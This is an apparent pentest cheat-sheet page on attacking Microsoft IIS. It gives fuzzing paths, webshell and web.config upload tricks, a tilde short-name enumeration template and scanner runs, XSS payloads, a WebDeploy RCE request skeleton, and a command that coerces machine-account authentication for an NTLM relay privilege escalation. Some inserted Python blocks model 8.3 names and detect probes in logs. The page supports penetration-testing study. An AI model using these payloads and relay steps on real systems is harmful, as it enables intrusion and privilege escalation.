# IIS

## Fuzzing

```
/trace.axd
/trace.axd?id=1
/admin/help.cgi
/admin/help.cgi.bak
/admin/WS_FTP.LOG
/adovbs.inc
/confirm.asp.bak
/default.asp.bak
/login.asp.bak
/pindex.asp.bak
/rootlogin.asp.bak
/rootlogin.asp.old
/_vti_pvt/service.cnf
/include/common.inc
/WS_FTP.LOG
/service.cnf
/aspnet_client
/global.asax
/msdeploy.axd        <-- check CVE-2025-53772
```

Wordlists

{% embed url="<https://github.com/coffinxp/payloads/blob/main/iis.txt>" %}

{% embed url="<https://github.com/coffinxp/payloads/blob/main/aspx.txt>" %}

{% embed url="<https://github.com/reewardius/iis-pentest/tree/main>" %}

{% embed url="<https://github.com/nu11pointer/fuzzlists/blob/main/Discovery/iisfinal.txt>" %}

## trace.axd enabled

Information leak (ASP.NET trace viewer).

## Information disclosure

Try

```
target.com/><img>
```

This often discloses information.

## PUT method enabled

Try uploading an `.aspx` webshell or a `web.config`.

## Insecure File Upload

Try to upload a `web.config`:

{% embed url="<https://soroush.me/blog/2014/07/upload-a-web-config-file-for-fun-profit/>" %}

{% embed url="<https://soroush.me/blog/2019/08/uploading-web-config-for-fun-and-profit-2/>" %}

### Website using PHP

It is possible to use `filename="web<<"` in the file upload request. If `web<<` (equivalent to `web**`) would replace another file in the same directory (for example `web.aspx`), another combination can be used, such as `filename="web<<>fig"` or `filename='web"config'`.

{% embed url="<https://soroush.me/blog/2014/07/file-upload-and-php-on-iis-wildcards/>" %}

## web.config or web.xml

```
https://x.x.x.x/.//WEB-INF/web.config
https://x.x.x.x/.//WEB-INF/web.xml
```

## Viewstate

{% embed url="<https://github.com/0xacb/viewgen>" %}

{% embed url="<https://notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net#PoC>" %}

## Internal IP disclosure

```
> curl -v --http1.0 http://example.com

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016
```

## Tilde Enumeration

```
http://example.com/~a
http://example.com/~b
http://example.com/~c
...
```

Assume the server contains a hidden directory named `SecretDocuments`. When a request is sent to `http://example.com/~s`, the server replies with a `200 OK` status code, revealing a directory with a short name beginning with "s":

```
http://example.com/~se
http://example.com/~sf
http://example.com/~sg
...
```

Once the short name `secret~1` is identified, enumeration of specific file names within that path can be performed, potentially exposing sensitive documents:

```
http://example.com/secret~1/somefile.txt
http://example.com/secret~1/anotherfile.docx
```

The same IIS tilde directory enumeration technique can also detect 8.3 short file names for files within the directory.

```
http://example.com/secret~1/somefi~1.txt
```

If two files named `somefile.txt` and `somefile1.txt` exist in the same directory, their 8.3 short file names would be:

* `somefi~1.txt` for `somefile.txt`
* `somefi~2.txt` for `somefile1.txt`
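To make the mapping concrete, here is an added Python generator (not from the page or its linked tools) that reproduces how NTFS derives 8.3 short names for the long names in one directory: uppercase, drop embedded dots and spaces, keep six characters of the base and three of the extension, then append `~1`, `~2`, ... on collisions. It is a simplified model: only the `~1`..`~4` tails are produced (NTFS switches to a hash-based tail after four collisions), and a name that already fits 8.3, such as `WS_FTP.LOG` from the fuzzing list, is returned unchanged because NTFS stores no separate short name for it.

```python
import re

# Characters permitted in an 8.3 name; anything else becomes "_" when shortening.
_ALLOWED = "A-Z0-9!#$%&'()@^_`{}~-"
_INVALID = re.compile(f"[^{_ALLOWED}]")
_IS_8DOT3 = re.compile(rf"[{_ALLOWED}]{{1,8}}(\.[{_ALLOWED}]{{1,3}})?")


def is_8dot3(name: str) -> bool:
    """True if the long name already satisfies 8.3, so NTFS stores no separate short name."""
    return _IS_8DOT3.fullmatch(name.upper()) is not None


def short_names(long_names):
    """Map each long name within one directory to the 8.3 short name NTFS would generate.

    Simplified model (assumption): only the numeric ~1..~4 tails are produced; real
    NTFS switches to a hash-based tail once a six-character prefix collides more
    than four times.
    """
    result, used = {}, set()
    for name in long_names:
        if is_8dot3(name):
            result[name] = name.upper()
            used.add(name.upper())
            continue
        base, dot, ext = name.rpartition(".")
        if not dot or not base:          # no extension, or a leading-dot name
            base, ext = name.lstrip("."), ""
        base = _INVALID.sub("_", base.upper().replace(".", "").replace(" ", ""))[:6]
        ext = _INVALID.sub("_", ext.upper().replace(" ", ""))[:3]
        for n in range(1, 5):
            candidate = f"{base}~{n}" + (f".{ext}" if ext else "")
            if candidate not in used:
                break
        else:
            raise ValueError(f"{name!r}: more than four collisions, NTFS would use a hash-based tail")
        used.add(candidate)
        result[name] = candidate
    return result


if __name__ == "__main__":
    # Constructed directory listing; SecretDocuments is the page's own example.
    listing = ["SecretDocuments", "somefile1.txt", "WS_FTP.LOG", "web.config", "aspnet_client"]
    for long, short in short_names(listing).items():
        print(f"{long:20} -> {short}")
```

On the defensive side, `fsutil 8dot3name set` only stops new short names from being created; names already on disk remain until removed with `fsutil 8dot3name strip`.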

## **IIS Tilde Enumeration Scanner - Burp Extension**

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FLTRtdjI0stcOEjWEIrsf%2F1_E4PpUH8YqmGGMFG8ub9tEw.webp?alt=media&#x26;token=5e660e69-26b4-4fbe-922d-2a4dfbe6f40a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F6aCvRUNfrAqTacfBjRzU%2F1_DWeBQlJnpefYRHGTmtMbjg.webp?alt=media&#x26;token=e8f160b7-6f94-446a-a2ca-230baf860912" alt=""><figcaption></figcaption></figure>

## **Nuclei Template**

<https://github.com/coffinxp/priv8-Nuclei/blob/main/iis.yaml>

```yaml
id: iis-shortname

info:
  name: iis-shortname
  author: coffin
  severity: low
  description: When IIS uses an old .NET Framework it is possible to enumerate folders with the ~ symbol.
  reference:
    - https://github.com/irsdl/IIS-ShortName-Scanner
    - https://github.com/lijiejie/IIS_shortname_Scanner
    - https://www.exploit-db.com/exploits/19525
  tags: iis

variables:
  randstring: "{{to_lower(rand_base(8))}}"

requests:
  - raw:
      - |
        GET /{{randstring}}*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
      - |
        GET /*~1*/a.aspx' HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
      - |
        OPTIONS /{{randstring}}*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
      - |
        OPTIONS /*~1*/a.aspx' HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
      - |
        DEBUG /{{randstring}}*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
      - |
        DEBUG /*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 != 404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404 || status_code_5 != 404 && status_code_6 == 404"
```
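As an added defender-side counterpart (not part of the template or its author's work), this Python snippet parses constructed IIS W3C extended log lines and flags clients that send wildcard short-name probes such as `/s*~1*/a.aspx`, counting the 404 answers as hits because the template's DSL keys on exactly that 404-versus-not-404 difference between a matching and a non-matching wildcard.

```python
import re
from collections import defaultdict

# Constructed sample of an IIS W3C extended log; not captured from a real server.
# IIS replaces spaces inside a field (e.g. the User-Agent) with "+", so entries
# can be split on whitespace.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2024-05-01 10:00:01 10.0.0.5 GET /index.aspx - 80 - 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) 200 0 0 15
2024-05-01 10:00:02 10.0.0.5 OPTIONS /*~1*/a.aspx - 80 - 198.51.100.9 python-requests/2.31 404 0 2 3
2024-05-01 10:00:02 10.0.0.5 OPTIONS /a*~1*/a.aspx - 80 - 198.51.100.9 python-requests/2.31 400 0 0 2
2024-05-01 10:00:03 10.0.0.5 OPTIONS /s*~1*/a.aspx - 80 - 198.51.100.9 python-requests/2.31 404 0 2 2
2024-05-01 10:00:03 10.0.0.5 OPTIONS /se*~1*/a.aspx - 80 - 198.51.100.9 python-requests/2.31 404 0 2 2
2024-05-01 10:00:05 10.0.0.5 GET /about.aspx - 80 - 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) 200 0 0 12
"""

# A short-name probe carries a wildcard right next to the 8.3 tail, e.g. /s*~1*/a.aspx
PROBE = re.compile(r"\*~\d|~\d\*")


def parse_w3c(text):
    """Yield one dict per log entry, taking column names from the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def tilde_probers(text, threshold=3):
    """Return {client_ip: {"probes": n, "hits": m}} for clients that sent at least
    `threshold` wildcard short-name probes.  A 404 counts as a hit: a vulnerable IIS
    answers 404 when the wildcard matches an existing 8.3 name and 400 when it does
    not, which is the oracle the scanners and the template above rely on."""
    stats = defaultdict(lambda: {"probes": 0, "hits": 0})
    for entry in parse_w3c(text):
        if PROBE.search(entry.get("cs-uri-stem", "")):
            client = stats[entry["c-ip"]]
            client["probes"] += 1
            if entry.get("sc-status") == "404":
                client["hits"] += 1
    return {ip: s for ip, s in stats.items() if s["probes"] >= threshold}


if __name__ == "__main__":
    for ip, s in tilde_probers(SAMPLE_LOG).items():
        print(f"{ip}: {s['probes']} short-name probes, {s['hits']} matched a 8.3 name")
```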

## ShortScan

{% embed url="<https://github.com/bitquark/shortscan>" %}

```
shortscan http://yourtarget.com -F
```

## **IIS ShortName Scanner**

{% embed url="<https://github.com/irsdl/IIS-ShortName-Scanner>" %}

```shell-session
java -jar iis_shortname_scanner.jar 0 5 http://10.129.204.231/

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Do you want to use proxy [Y=Yes, Anything Else=No]? 
# IIS Short Name (8.3) Scanner version 2023.0 - scan initiated 2023/03/23 15:06:57
Target: http://10.129.204.231/
|_ Result: Vulnerable!
|_ Used HTTP method: OPTIONS
|_ Suffix (magic part): /~1/
|_ Extra information:
  |_ Number of sent requests: 553
  |_ Identified directories: 2
    |_ ASPNET~1
    |_ UPLOAD~1
  |_ Identified files: 3
    |_ CSASPX~1.CS
      |_ Actual extension = .CS
    |_ CSASPX~1.CS??
    |_ TRANSF~1.ASP
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FfQBVfC5m5H22vvJsAn9E%2Fimage.png?alt=media&#x26;token=c10868d9-7592-4f10-a6a2-3d8b4dc81a2e" alt=""><figcaption></figcaption></figure>

Upon executing the tool, it discovers 2 directories and 3 files. However, the target does not permit `GET` access to `http://10.129.204.231/TRANSF~1.ASP`, necessitating the brute-forcing of the remaining filename.

Or:

{% embed url="<https://github.com/lijiejie/IIS_shortname_Scanner>" %}

```
# python iis_shortname_scan.py http://target
```

### **Generate Wordlist**

```shell-session
egrep -r ^transf /usr/share/wordlists/ | sed 's/^[^:]*://' > /tmp/list.txt
```

### Fuzzing

```shell-session
gobuster dir -u http://10.129.204.231/ -w /tmp/list.txt -x .aspx,.asp
```

## XSS

```
http://domain.com/dossier/(Z("onerror="alert%601%60"))/file.aspx

http://domain.com/dossier/(Z("onerror="confirm%60Redirect%20Login%60"))/file.aspx
```

See the XSS page (ASP section):

{% content-ref url="xss" %}
[xss](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/xss)
{% endcontent-ref %}

## CVE-2025-53772 IIS WebDeploy RCE

```
/msdeploy.axd
```

{% embed url="<https://hawktrace.com/blog/cve-2025-53772>" %}

{% embed url="<https://gist.github.com/hawktrace/67836c7e9f35b72077b50f220349cd73>" %}

Sending this payload in an HTTP POST to /msdeploy.axd results in calc.exe launching on the server.

```
POST /msdeploy.axd HTTP/1.1
Host: msdeploy.webserver.com
MSDeploy.RequestId: 1
Content-Type: application/msdeploy
MSDeploy.Method: Sync
MSDeploy.SyncOptions: H4sIAAAAAAAAA...[Generated Payload]
Content-Length: 0
```

## Resources

{% embed url="<https://infosecwriteups.com/how-to-find-bugs-in-microsoft-iis-page-ef336a229abc>" %}

{% embed url="<https://medium.com/@far00t01/asp-net-microsoft-iis-pentesting-04571fb071a4>" %}

{% embed url="<https://pentestbook.six2dez.com/enumeration/webservices/iis>" %}

{% embed url="<https://github.com/reewardius/iis-pentest>" %}

## Script to configure IIS

{% embed url="<https://gist.github.com/kking124/7f34ca1f2b98c21753e3ecd8ecb86663>" %}

## Privilege Escalation

To coerce an HTTP authentication from the machine account:

```
powershell iwr http://192.168.56.1 -UseDefaultCredentials
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F4idPfaJBuUwjTzdVZHzh%2Fimage.png?alt=media&#x26;token=8ec1c26c-7e55-47f2-b754-923657554b2e" alt=""><figcaption></figcaption></figure>

then relay to LDAP and either:

* start\_tls + add a computer to the domain + RBCD, or
* shadow credentials

Example with RBCD:

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F1MvY66f8NBEJjFcX02Kr%2Fimage.png?alt=media&#x26;token=06febfcc-4611-451e-9764-23aff65c9331" alt=""><figcaption></figcaption></figure>

Shell as admin:

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FCS5TMv9feLfjIoUNN7Ty%2Fimage.png?alt=media&#x26;token=b40a98ef-a5a0-4964-8aee-83108a932ae9" alt=""><figcaption></figcaption></figure>

Credit: [M4fly](https://x.com/M4yFly/status/1745581076846690811)


## Interesting Books

{% content-ref url="../../interesting-books" %}
[interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more.
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them.
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.
